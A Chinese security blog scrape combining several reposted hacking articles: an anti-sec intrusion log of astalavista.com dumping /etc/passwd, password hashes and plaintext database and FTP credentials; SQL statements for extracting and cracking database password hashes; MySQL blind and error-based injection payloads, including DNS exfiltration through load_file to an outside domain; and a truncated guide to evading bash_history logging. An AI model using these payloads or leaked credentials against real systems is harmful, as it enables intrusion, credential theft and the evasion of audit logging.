# for i in $1 ; do mv “$i” `echo $i | sed ‘s/ /_/g’` ; done

查看远程主机时间

# telnet remotehostname 13|grep :

只显示 top 命令的states 行

#while true; do top -d 2 | col -b | grep states; sleep 10; done

加速显示　tar 文件内容

# tar tvfn

让目录名也能　Spell Check

#shopt -s cdspell

当输错命令时，系统会自动进入类似的目录

查看　Sun 服务器型号

# /usr/platform/`uname -m`/sbin/prtdiag -v | grep `uname -m`

在vi 中一行文字前后添加字符

:/^(.*)/s//我要 1 添加/

查找某包含字符串(Verita)软件包的详细信息 (Solaris)

pkginfo -l `pkginfo | grep -i VERITAS | awk ‘{print $2}’`

Astalavista被蹂躏过程

admin — Thu, 24 Mar 2011 07:36:50 +0000

来源：素包子的博客

http://baoz.net/

里面两个亮点，一是远程获得apache用户权限的shell，banner是LiteSpeed，看来这玩意有0day，但是又怎么是用apache用户跑的，原来LiteSpeed这东西是和apache绑一起的，大概看了下介绍，主要功能是anti-ddos，这东西貌似还有点意思，回头玩玩。具体的看http://www.litespeedtech.com/litespeed-web-server-features.html。

[root@front3 ~]# curl -I litespeedtech.com
HTTP/1.1 200 OK
Date: Fri, 05 Jun 2009 22:54:51 GMT
Server: LiteSpeed

另外一个亮点就是localroot了，如果不是udev的话，那么就是RHEL5.3 x64还有一个localroot 0day -_-

有人说astalavista被黑是因为Y拿milw0rm的东西赚钱，这个我觉得就是每个人的尺度问题，有人还把别人写的文章弄成自己写的，还有人把别人的程序改成自己的，多了去了。

/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
\/ \/ \/ \/ \/ \/ \/
The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group

From < http://astalavista.com/faq>:
>> 03. Who’s behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.

>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
military institutions.
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.

Why has Astalavista been targeted?

Other than the fact that they are not doing any of this for the “community” but
for the money, they spread exploits for kids, claim to be a security community
(with no real sense of security on their own servers), and they charge you $6.66
per months to access a dead forum with a directory filled with public releases
and outdated / broken services.

We wanted to see how good that “team of security and IT professionals” really is.

Let’s begin.

anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner…
LiteSpeed
[+] Injecting shellcode…
[-] Wait for it

[~] We g0tshell
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)

sh-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
jon:x:502:503::/home/jon:/bin/bash
com:x:503:504::/home/com:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
astanet:x:504:505::/home/astanet:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

sh-3.2$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
80.74.154.172 asta1.astalavistaserver.com

sh-3.2$ pwd
/home/com/public_html

sh-3.2$ ls -la
total 18460
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
drwx–x–x 11 com com 4096 Jun 25 2008 ..
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
drwxrwxrwx 2 com com 4096 May 19 00:50 config
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam

sh-3.2$ head -20 index.php

/**
* The main page for the CMS
* @copyright CONTREXX CMS - COMVATION AG
* @author Comvation Development Team
* @version v1.0.9.10.1 stable
* @package contrexx
* @subpackage core
* @link http://www.contrexx.com/ contrexx homepage
* @since v0.0.0.0
* @todo Capitalize all class names in project
* @uses /config/configuration.php
* @uses /config/settings.php
* @uses /config/version.php
* @uses /core/API.php
* @uses /core_modules/cache/index.class.php
* @uses /core/error.class.php
* @uses /core_modules/banner/index.class.php
* @uses /core_modules/contact/index.class.php

sh-3.2$ cd config/
sh-3.2$ ls -la
total 32
drwxrwxrwx 2 com com 4096 May 19 00:50 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php

sh-3.2$ cat configuration.php
[snip]
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
[snip]
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
$_FTPCONFIG['port'] = 21; // Ftp remote port
$_FTPCONFIG['username'] = ‘dev@astalavista.com’; // Ftp login username
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms

sh-3.2$ cd ..
sh-3.2$ cd dvd/
sh-3.2$ ls -la
total 2913780
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess

sh-3.2$ cat .htaccess
authType Basic
authName DVD
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
require valid-user

sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
DVDdownload:CRD8cuY6.MPT6
DVDdownload2:CR8a36.wluFMg

sh-3.2$ cat test.php
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
echo $url;
?>

sh-3.2$ cd modifications/
sh-3.2$ ls -la
total 32
drwxr-xr-x 8 com com 4096 May 11 12:48 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp

sh-3.2$ ls -R
.:
com_avtng cronjobs onlinetools pjirc search _tmp

./com_avtng:
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts

./com_avtng/scripts:
popunder.js

./cronjobs:
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp

./cronjobs/tmp:
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv

./onlinetools:
index.php

./pjirc:
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd

./pjirc/img:
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
verre-eau.gif
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
verre-vin.gif
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif

./pjirc/snd:
bell2.au ding.au

./search:
searchEngines.php search.php

./_tmp:
defaultPorts.php defaultPorts.txt

sh-3.2$ cd cronjobs/
sh-3.2$ cat exploits.php
[snip]
$categories = array();
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
$expolits = file($milw0rmFile);
$comExploits = array();
[snip]
// manage data
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640

// get path and title
$expolits[$x] = trim($expolits[$x]);
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);

// check if file exists
if (file_exists($path)) {

$text = file_get_contents($path);

// get content and date
//$text = htmlspecialchars($text, ENT_QUOTES);
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
if ($tmptext != ”) {
$text = $tmptext;
} else {
$text = addslashes(htmlentities($text, ENT_QUOTES));
}
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
$tmp = explode('-', $date);
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
$cat = getCategory ($path);
$ext = pathinfo(basename($path));
$ext = $ext['extension'];
$qStr = ”
SELECT `id`
FROM `contrexx_module_exploits`
WHERE `title` = ‘” . $title . “‘
AND `date` = ‘” . $date . “‘
“;
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
$q = $_objDB->query($qStr);

if ($q->numRows() == 0) {

// prepare array
$comExploits[$x]['date'] = $date;
$comExploits[$x]['title'] = $title;
$comExploits[$x]['author'] = ‘milw0rm’;
$comExploits[$x]['text'] = $text;
$comExploits[$x]['source'] = $ext;
$comExploits[$x]['url1'] = ”;
$comExploits[$x]['url2'] = ”;
$comExploits[$x]['catid'] = $cat;
$comExploits[$x]['lang'] = ‘2′;
$comExploits[$x]['userid'] = ‘12′;
$comExploits[$x]['startdate'] = ‘0000-00-00′;
$comExploits[$x]['enddate'] = ‘0000-00-00′;
$comExploits[$x]['status'] = ‘1′;
$comExploits[$x]['changelog'] = $date;

}
[snip]
$xml = ‘

http://www.astalavista.com/exploits All availably Exploits.

各种数据库密码hash获取语句

admin — Thu, 24 Mar 2011 07:34:09 +0000

各种数据库密码hash获取语句，也可以直接使用sqlmap这个注入工具！

SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name=’sa’
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash

SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name=’sa’
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo’s comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins

MYSQL:-
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1
mysql> SELECT PASSWORD(‘mypass’);
+——————–+
| PASSWORD(‘mypass’) |
+——————–+
| 6f8c114b58f2ce9e |
+——————–+

*mysql >=4.1
mysql> SELECT PASSWORD(‘mypass’);
+——————————————-+
| PASSWORD(‘mypass’) |
+——————————————-+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+
Select user, password from mysql.user
The hashes can be cracked in ‘cain and abel’

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
select usename, passwd from pg_shadow;
usename | passwd
——————+————————————-
testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
More on Oracle later, i am a bit bored….

Mysql 另类盲注中的一些技巧

admin — Wed, 02 Mar 2011 06:45:08 +0000

转:oldjun.com
—————————————————————————-

很多技巧从国外的paper学到的，不过国内没有多少人使用，所以发出来，笔记下~

一、order by 的参数注入技巧：
两种方法，思路都一样。

example. “select username,password from uc_members order by”.$_GET['oderby']

a.常见的利用方法：
1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));
返回错误：[Err] 1242 – Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,If((select 1)=1,1,(select value from uc_settings));
返回正常。

b.国外paper看到的方法：
1.[SQL] select username,password from uc_members order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;
返回错误：[Err] 1242 - Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;
返回正常。

二、limit 的参数注入技巧：

a.order by之后的limit参数的注入，因为正常的sql语句order by后无法接union，所以没有好办法，就一个鸡肋思路：into outfile ‘/www/root/xxx.php’;

b.limit前无order by时的注入，那就方便多了，后面可以直接接union select ，随便怎么注都行了：
select * from cdb_members limit 1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7
这里还有个技巧，使用procedure analyse可以获取字段名称：
select * from cdb_members where uid=1 limit 1,1 procedure analyse()
不过procedure analyse同样不能使用在order by之后：
[SQL] select * from cdb_members order by uid desc limit 1 procedure analyse()
[Err] 1386 – Can’t use ORDER clause with this procedure

三、无法猜测字段时的技巧：

在mysql5以下版本或者information_schema 无法访问的时候，无法猜到某个表的字段名，于是可以采用这个办法，在子查询中使用%0，报错获得列名。以ucenter的uc_members为例。

1.猜测列数：SELECT 1 FROM `uc_members` where (SELECT * FROM `uc_members`)=(1)
返回错误：#1241 – Operand should contain 12 column(s)
2.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2,3,4,5,6,7,8,9,10,11,12 limit 1)
返回正常。
3.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1%0,2,3,4,5,6,7,8,9,10,11,12 limit 1)
返回错误：#1048 – Column ‘uid’ cannot be null
4.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2%0,3,4,5,6,7,8,9,10,11,12 limit 1)
返回错误：#1048 – Column ‘username’ cannot be null
5. ……

注：5.1以上版本不适用，字段必须为非空（not null）

四、windows下利用dns解析盲注的技巧：

如果盲注很累，或者页面无论and 1=1还是and 1=2的时候返回都一模一样，这个时候利用dns进行注入是个不错的方法，前提是win环境root权限下的mysql，利用load_file函数读取远程文件的思路。本地搭建一个dns服务器，然后将特定域名的NS server转过来。然后进行注入，并抓包。

本地测试了下（实际注入中单引号可以编码）：select load_file(concat(‘\\\\aaa1.’,(select user()),’.oldjun.com\\a.txt’))，抓包成功获得select的结果：
29 28.524843 192.168.9.107 192.168.1.2 DNS Standard query A aaa1.root@localhost.oldjun.com

如图所示：

mysql错误信息的利用

admin — Wed, 02 Mar 2011 06:14:27 +0000

在很多的情况下我们不能直接方便的进行注入，于是有了BENCHMARK延迟注射；
如果能得到MySQL的错误信息的话(必须是程序主动输出mysql错误，php中是调用mysql_error()，其他脚本可能有自己的函数)，现在又有了更方便的方法。
网上流传了两三种方法:
=========================================================================

第一种略，略过了，低版本mysql适用

http://hi.baidu.com/toby57/blog/item/26416060c1d92c48eaf8f839.html

=========================================================================

第二种：

SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT ‘x’))a from information_schema.tables group by a)b;

ERROR 1062 (23000): Duplicate entry ’1x’ for key ‘group_key’

这种方法对MySQL版本没什么要求，但只能爆出64字节的数据，用这种方法遇到大数据只能MID慢慢来了。

(select 1 from (select count(*),concat((+++),floor(rand(0)*2))x from information_schema.tables group by x)k)

=========================================================================

第三种：

通过对ExtractValue和updataxml函数传递不合XPATH语法规则的参数来爆出数据。(只针对MySQL 5.1++,低于5.1的无此函数)

SELECT 1 AND ExtractValue(1, CONCAT(0x5c,(SELECT @@VERSION)))

ERROR 1105 (HY000): XPATH syntax error: ‘\5.1.40-community’

SELECT 1 FROM dede_admin WHERE updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1);

ERROR 1105 (HY000): XPATH syntax error: ‘[admin:7a57a5a743894a0e]‘

updatexml(1,CONCAT(0x5c,(SELECT @@VERSION)),1);

比上一种方法方便简洁，不过这方法只能爆出32字节的数据。同样，大数据只能Mid了。

百度一下这两个函数：
EXTRACTVALUE (XML_document, XPath_string);
第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
第二个参数：XPath_string (Xpath格式的字符串)。
作用：从目标XML中返回包含所查询值的字符串
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。
第三个参数：new_value，String格式，替换查找到的符合条件的数据
作用：改变文档中符合条件的节点的值

Hacking Bash History

admin — Fri, 31 Dec 2010 17:01:50 +0000

[==============================================================================]
[---------------------------[ Hacking Bash History ]—————————]
[==============================================================================]

By: ithilgore – ithilgore.ryu.L@gmail.com
July 2008

————-[ Table of Contents ]————-

i. Preface
ii. Hardening bash_history
iii. Attacking the logging mechanism
iv. Hacking bash – interfacing with syslog
v. Conclusion
vi. References

[ i. Preface ]
==============

Bash is probably the most widely used shell in the *nix world and one of it’s
features is the history mechanism. The history mechanism is mainly used for the
user’s convenience – less typing -> work done faster. However, it has been
discussed that bash_history can also be used as a logging mechanism to monitor
users’ activity. This article covers the arguments against the above and why the
mechanism is useless against someone who thinks out of the box. We are going
to see that every defensive measure taken for protecting the history file can
be subverted with little or no difficulty. The discussion will be increasive
in the strictness of the methods applied but that doesn’t meant they will be
increasingly difficult to implement. Most of them are no-brainers. In the end,
we are going to meddle with the bash source code to make the logging mechanism
(at first sight) “invincible” and we are going to see why even that can fail.

[ ii. Hardening bash_history ]
==============================

Suppose you are an administrator of a shell-providing box and there is a really
pesky user whose activities you would like to monitor, since you are really
suspicious about what he does late at night with the precious CPU power and
system resources that you have pledged to protect against malicious (or other)
usage. Let’s call the user Bob – enough of using Trinity as the “bad” one all
the time. Since all users use bash as their default shell in the server, you
start making a few changes to the bash configuration files.

// Step 1 //

– Make the bash history and relevant files undeletable/unchangeable.

The first thing Bob would probably do would be to symlink his history to
/dev/null.

bob$ rm ~/.bash_history
bob$ ln -s /dev/null ~/.bash_history

That can be prevented by making that file append-only. This can be accomplished
by issuing the following command:

# chattr +a /home/bob/.bash_history

This will use file system extended attributes to mark the file as append only.
Most filesystems (ext2/3, XFS, JFS) support this. On FreeBSD the same
would be done by issuing:

# sappnd /home/bob/.bash_history

You might also want to apply this to all the bash configuration files that
are read during bash startup:

# chattr +a /home/bob/.bash_profile
# chattr +a /home/bob/.bash_login
# chattr +a /home/bob/.profile
# chattr +a /home/bob/.bash_logout
# chattr +a /home/bob/.bashrc

The first three are read by bash in that order (after reading /etc/profile
which applies to all users) when an interactive login bash shell (or a
non-interactive shell with the –login option) is invoked.
.bashrc is only read when a non-login interactive shell is invoked. That means
the case when the user has already logged in and invokes a new bash shell by
himself like:

bob$ bash

Note that .bashrc is the *only* configuration file that is read in this case.
The other 3 conf files are *not* read again.

After doing the above changes, it’s time to move on to some more “hardening”.
One more step towards (futile) protection.

// Step 2 //

– Configure .bash* configuration files

All changes will be made to .bashrc. It is assumed the other three
configuration files mention reading .bashrc in their body. This means that
.bashrc is read in *every* case (whether the user just logins or invokes a new
bash shell after he has logged in).

By making all changes to .bashrc protects against the case where Bob would
invoke a new bash shell after he had logged in so that all configuration
options would be nullified. If the options were only at the three main
configuration files (.bash_profile, .bash_login, .profile) then the above would
happen. On the other hand, these files must read .bashrc in their body so that
the options mentioned to .bashrc are actually applied in the first login shell
as well.

# cat >> /home/bob/.bashrc << EOF
> shopt -s histappend
> readonly PROMPT_COMMAND=”history -a”
> EOF

The option histappend orders bash to append the last $HISTSIZE lines to the
$HISTFILE file (normally ~/.bash_history) whenever an interactive shell exits.
By default, bash overwrites $HISTFILE each time so that only one session is
kept to save space.

The enviromental variable PROMPT_COMMAND holds a command that is to be executed
prior to issuing each prompt. This means that “history -a” is executed prior
to every command the user issues. This ensures that whatever command was typed
just before the current one, is immediately appended to $HISTFILE. This ensures
more robustness in the logging mechanism, as bash doesn’t wait until the whole
session is finished to transfer to the disk the history lines from the memory.
The readonly attribute is used so that this variable is marked as non-writeable
in case Bob wants to ovewrite it and most probably nullify it.

One last substep to the above changes would be to mark as readonly all the
environment variables associated with bash_history:

readonly HISTFILE
readonly HISTFILESIZE
readonly HISTSIZE
readonly HISTCMD
readonly HISTCONTROL
readonly HISTIGNORE

// Step 3 //

- Disable all access to all other out of the box shells of the system. Usually,
these will be csh, tcsh and maybe ksh.

# chmod 750 csh
# chmod 750 tcsh
# chmod 750 ksh

This will prevent Bob from changing his shell from bash to another one.
Now, the astute administrator will complain that the above are *not*
the only shells out of the box! This is both true and false. But before you jump
to quantum theory conclusions based on the above statement, let’s clear some
things up.
A long time ago …(you know the rest), there was only the Bourne shell or sh.
Nowadays, /bin/sh is actually a symbolic link to /bin/bash. Bash checks the
name by which it was invoked and if this is sh, it tries to mimic the behaviour
of the historic versions of sh and also conform to POSIX. If started as an
interactive login shell or non-interactive shell with the –login option it
attemts to read /etc/profile and ~/.profile for startup configuration. If it is
invoked as an interactive shell, then it tries to expand the variable $ENV and
if it is not empty, uses its value as the configuration file to read and
execute. We shall see in the next section of this text, how this can be used to
override most or all bash settings.

[ iii. Attacking the logging mechanism ]
========================================

It is time to see the whole thing from Bob’s perspective. We are going to
examine how each of the above steps can be subverted. In practice, the
possibilities are endless. The techniques that will be discussed here are only
a small subset of the available methods to override the bash_history logging
mechanism.

// Method 1 //

– Use the Bourne shell /bin/sh as an escape mechanism

$ /bin/sh

Invoking sh will result in bash mimicing the historic version of sh and as
mentioned above will not read any configuration files directly related to bash.
Thus, the user will now be able to void the $HISTFILE variable, since it will
no longer be marked as readonly.

$ unset HISTFILE

This will make the logging mechanism inactive for the current session, as the
variable controlling the file where the commands are logged, will be empty.

Note: the same can be done by invoking /bin/rbash (if it exists on the system)
which acts as a restricted version of bash and it is, like sh, a symbolic link
to bash) but it’s really irritating to move around using it.

// Method 2 //

– Order bash to not read the .bashrc configuration file

This can be done by invoking bash like this:

$ /bin/bash –norc

This will inhibit bash from reading .bashrc and thus the variables marked as
readonly will be writeable. Then you can type something like:

$ HISTFILE=

which will clear the $HISTFILE variable -> no history

[ iv. Hacking bash - interfacing with syslog ]
==============================================

We can clearly deduce from the above that any conventional means to secure
the bash_history is actually futile. However, we can go one step ahead and hack
bash itself to make it’s logging mechanism less vulnerable and more covert.
Note that even this can be subverted. Bash was never meant to act as a logging
facility and is too far away from the kernel to be able to be robust at doing
so even if hacked at its core.

The idea is to alter the bash source code so that every command the user types,
will be sent to syslog which in turn will log it in an file at /var/log. We
